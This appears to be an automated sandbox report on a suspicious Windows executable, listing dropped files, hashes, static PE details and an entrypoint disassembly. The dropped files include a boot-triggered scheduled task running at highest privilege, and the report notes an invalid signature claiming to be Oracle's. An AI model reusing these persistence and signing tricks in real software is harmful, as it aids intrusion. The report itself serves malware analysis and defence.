SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohhd1poc.yb3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_os5owfuf.lik.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osrnlb0d.qnp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkxf4els.j1l.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qndifcjs.vbt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r2afbjcf.rpm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_roq2nwy3.wyg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sl5cf5yk.n44.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_smfhy2wt.j0j.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_szgmvgsk.owc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tinzmqf3.3gu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_unrgwc5r.wwc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1ijdagj.bbz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2doyt30.ejr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzbd2kw1.c5r.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0patmto.wb1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yxkvfns2.pnr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zaydumyv.qhv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhilpjp5.fnq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml

Download File

Process:	C:\Users\user\Desktop\sE5IdDeTp2.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1512
Entropy (8bit):	5.139302350214515
Encrypted:	false
SSDEEP:	24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEBwcLYt:cC3IQDL60uydbQ9IIYODOLqOdq2sbEW7
MD5:	D99791DECBB48A340B6C63C225B3EFDC
SHA1:	0C2D9A362D0C6A33C2CCA6684366A8BB1158DCC0
SHA-256:	16037148C9AF0EFFA3F91960EB4F60F9E09F14585ACB6089FDCCDF64E68BD804
SHA-512:	B7B165C352B42354F35C449B4EF9A4C215914FD5023216549204F16FF3281FB3FD0077E3B9585FFFDF25F2FA5CD78910E6298D3F1E9944C835F7CCBC9893EFB9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl

C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml

Download File

Process:	C:\Windows\System32\conhost.exe
File Type:	data
Category:	dropped
Size (bytes):	1512
Entropy (8bit):	6.147836345315121
Encrypted:	false
SSDEEP:	24:Rk7mUqmzyRhRYPs2wvDndrjqQ6SZDulLAXpnSyBQhJR1PDRqC0I6NaKko5MheEgP:KrhzybOPs2wRqPSDpntWRNqCqtko5QuP
MD5:	DD3F4970B2B5945ED3E4E85B5FEFCB9A
SHA1:	6C313B3A004E55894C33A628D1FE1BA3F1B8DC76
SHA-256:	BC7D16248A343B19516690B483CA909130D44CC3C72FE2E239C03E85664A7CC4
SHA-512:	9E6C2655D7ADB81B92D5624833AECCA71B0CF17251F6E237034B7904BA4D50E65BCD471BECEF0C9324FDF276D90EE59C9D012CDE6E54D71663248265BE128380
Malicious:	false
Preview:	jce.vuyz.czy.brj.jgwhioxn.A.[hu{..ehu.ywb.zydbrirjgwhi..m..pkhu.jcehvv.wlcz.dbrf.i.w.ilxh.wpQhuv.=e.{uywl..yg..h.^gx.j.xmkwpkhv.{`.U..yt.czy]brirgg.hio(.kwpkhuvjcehvuyw.czykbriH.7@.iV{.kwpk.uvjce.vLz..cz9.be..]f.oilxmow.T.tf\cehvuywlc.ydbrirjgwhio(Wkwp..uvjcei.uyClg.y...f.jgw..l{.kwpS..Ojne.vu.w[bZy.brirjgwh..Gn.wpkhuv]ceh.u.wlczydbri..S.hi.xm.Wph..vjYehKuywll.yd]rk2jgwhilxmk.pkhuv.cehvuywlczy.f2irjgw.j.x.kw.khuy.ceV.uywb.zy].rR..g.hilxUh.p..uvjcei.uy@lnz.db.ixjgw...xh..pkhztjcek.u.t.czadbrirUgwTilxmewpkh.y.ck..uyt.czydc.\q>g.hilxmh:...uvo..e.uyw.l.yk.rf.i*...lxmkwpQk.vjne..uz.lcu..br.\|8gwRilxn..pkhv.\cj.uDwlc..dbr].jg.hio'.kwpkhuu..ei.uzwo.z.db.i~.gBhd.{.kt.khzwjce.vuywWcu.f.irRgwhicxmfwpkhuvjck..uywlczy^brirjgw(i.w.kwph..vjYehKuywll.yk.riNjgw.ilxmkwq+.x@jce.vuy.l.ZNg.ri}.gwoiax.owpkfuu.ehvuywlc.yd.p.rjgw(i.xmkwu..u.n.ehKuywlcEydbq9rjf7..lxmkwpk.uv.l.xAz'lczLdbrirS.wh.b.mow..hv.j.k....wlczydbrUrjp.hio([kw..huvjcehvuywlcz.dbrirjgwhl.{.kt..huNi3e.{uyy.czL.be..]f.hilxmkw..hux.buh.{..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.811982830856188
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	sE5IdDeTp2.exe
File size:	1'245'320 bytes
MD5:	dd36f6f79e68d5e54c75527db2da97ad
SHA1:	a373e613510ada66cea74ffc590c25edc59957ac
SHA256:	3030ba393865e41fee490205bf5873b4041275a8830d5e764693771fec2bd35e
SHA512:	e1f9e1c8d246fd381d5af12c87940df54df9f6877bff58abdea7a8d533a31a675b553d7e5bb134bb64576de53a3c72c4e8a3e624a639c13dfa918f2a4a638fd1
SSDEEP:	12288:2iQnVXYD4TNwzBcgXn0dE/xmiNrP64F78O9PpctLMbl0UVh4OsYX0bLDHOM5p:KNw1iS/EiNb64F78yPd+WDsYX0bLzOCp
TLSH:	2C45E093B06D20E9CC3BF03CA619A232E767B8A4175150CB59712A326B5BCD45FF893D
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...X..g.........."......~...V......@..........@.............................P............`........................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x140001140
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6782E258 [Sat Jan 11 21:27:52 2025 UTC]
TLS Callbacks:	0x400022f0, 0x1, 0x40002370, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	25b2e2929328699a3b459a68f5fdc7fb

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	19/08/2021 01:00:00 20/08/2023 00:59:59
Subject Chain	CN="Oracle America, Inc.", OU=Software Engineering, O="Oracle America, Inc.", L=Redwood City, S=California, C=US
Version:	3
Thumbprint MD5:	2876C1BECB51837D0E3DE50903D025B6
Thumbprint SHA-1:	940D69C0A34A1B4CFD8048488BA86F4CED60481A
Thumbprint SHA-256:	EE46613A38B4F486164BCE7FB23178667715617F511B364594311A1548B08EB1
Serial:	068BE2F53452C882F18ED41A5DD4E7A3

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [00027ED5h]
mov dword ptr [eax], 00000001h
call 00007F6844E5656Fh
nop
nop
nop
dec eax
add esp, 28h
ret
nop
inc ecx
push edi
inc ecx
push esi
push esi
push edi
push ebx
dec eax
sub esp, 20h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov edi, dword ptr [eax+08h]
dec eax
mov esi, dword ptr [00027EC9h]
xor eax, eax
dec eax
cmpxchg dword ptr [esi], edi
sete bl
je 00007F6844E56590h
dec eax
cmp edi, eax
je 00007F6844E5658Bh
dec esp
mov esi, dword ptr [0002F361h]
nop word ptr [eax+eax+00000000h]
mov ecx, 000003E8h
inc ecx
call esi
xor eax, eax
dec eax
cmpxchg dword ptr [esi], edi
sete bl
je 00007F6844E56567h
dec eax
cmp edi, eax
jne 00007F6844E56549h
dec eax
mov edi, dword ptr [00027E90h]
mov eax, dword ptr [edi]
cmp eax, 01h
jne 00007F6844E5656Eh
mov ecx, 0000001Fh
call 00007F6844E7DEA4h
jmp 00007F6844E56589h
cmp dword ptr [edi], 00000000h
je 00007F6844E5656Bh
mov byte ptr [0012BA59h], 00000001h
jmp 00007F6844E5657Bh
mov dword ptr [edi], 00000001h
dec eax
mov ecx, dword ptr [00027E7Ah]
dec eax
mov edx, dword ptr [00027E7Bh]
call 00007F6844E7DE9Bh
mov eax, dword ptr [edi]
cmp eax, 01h
jne 00007F6844E5657Bh
dec eax
mov ecx, dword ptr [00027E50h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2ff98	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x133000	0x340	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x12f000	0x114c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x12d800	0x2888
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x134000	0x9b8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x292f0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2f1e8	0x138	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x30280	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x27de6	0x27e00	a99fe9d1965160ddc69106030cc4b61d	False	0.4477615595611285	data	6.386085069656227	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x29000	0x9230	0x9400	ec8b47ba5791ba2867ca49c3a5de31e5	False	0.2924936655405405	data	5.430027447616626	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x33000	0xfb0e5	0xf9e00	01fbf7309ccb3c49ca64f155cddd2cc8	False	0.6647239635442721	data	6.457361653180868	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x12f000	0x114c	0x1200	370eced07dff8d002397577b7f3ea16a	False	0.5180121527777778	data	5.213112045030989	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg	0x131000	0x10	0x200	fc74edd4cfadbf37e115bea8cdba7fcb	False	0.041015625	data	0.13091701814887827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x132000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x133000	0x340	0x400	01bd31ff039a2ba3032b09c68396f09a	False	0.37109375	data	2.789871934356042	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x134000	0x9b8	0xa00	74b3e8078809c63acec5e8ae3c7f631e	False	0.48203125	data	5.415805110669786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x133060	0x2e0	data	English	United States	0.46875

Imports

DLL

Import

msvcrt.dll

__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _aligned_free, _aligned_malloc, _amsg_exit, _assert, _cexit, _commode, _errno, _fmode, _initterm, _localtime64, _lock, _onexit, _time64, _unlock, _wcsicmp, _wcsnicmp, abort, calloc, exit, fflush, fprintf, fputc, fputwc, free, fwprintf, fwrite, getenv, isxdigit, localeconv, malloc, memchr, memcmp, memcpy, memmove, memset, realloc, signal, strcmp, strerror, strlen, strncmp, vfprintf, wcscat, wcscpy, wcsftime, wcslen, wcsncmp

KERNEL32.dll

